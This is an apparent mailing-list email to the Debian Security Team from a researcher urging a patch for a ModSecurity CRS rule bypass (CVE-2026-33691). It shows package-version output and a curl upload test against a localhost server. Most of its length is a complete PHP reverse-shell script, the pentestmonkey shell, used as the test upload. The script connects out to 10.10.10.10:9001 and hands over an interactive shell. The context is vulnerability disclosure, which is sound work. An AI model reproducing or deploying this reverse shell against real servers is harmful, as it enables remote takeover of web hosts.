i see root@4cbc316d5a12:/# dpkg -l | grep modsecurity-crs
apt-cache policy modsecurity-crs
ii  modsecurity-crs                3.3.7-1+deb13u1
 all          OWASP ModSecurity Core Rule Set
modsecurity-crs:
  Installed: 3.3.7-1+deb13u1
  Candidate: 3.3.7-1+deb13u1
  Version table:
 *** 3.3.7-1+deb13u1 100
        100 /var/lib/dpkg/status
root@4cbc316d5a12:/#


Still the old version in a the stable debian

and i tried as a test

relunsec@relunsec:~/CVE-2026-33691$ curl -i -X POST
"http://127.0.0.1:8082/upload"; -F "file=@test. php"
HTTP/1.1 404 Not Found
Date: Tue, 14 Apr 2026 08:23:17 GMT
Server: Apache/2.4.66 (Debian)
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd";>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.66 (Debian) Server at 127.0.0.1 Port 8082</address>
</body></html>
relunsec@relunsec:~/CVE-2026-33691$ cat 'test. php'
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments
stripped to slim it down. RE:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.10';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and
not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

i see nothing blocked

On Mon, Apr 13, 2026 at 4:43 AM cyber security <[email protected]> wrote:
>
> Hello, Debian Security Team
>
>
> that is 15 days, the cve still not patched,
> https://nvd.nist.gov/vuln/detail/CVE-2026-33691 it is already **High**
> Officialy by NIST, and a metasploit evaison module, will be soon
> published and i will open a pr linked to the issue
> **https://github.com/rapid7/metasploit-framework/issues/21228** and
> PRs is open **https://github.com/MarkLee131/awesome-web-pocs/pull/1**,
> you left users vulnerable to attacks. Only unstable users benefit from
> the patch, latest users remaining fully vulnerable, Users are waiting
> for patches from Debian, and it still not patched
>
> Best Regards,
> RelunSec

Reply via email to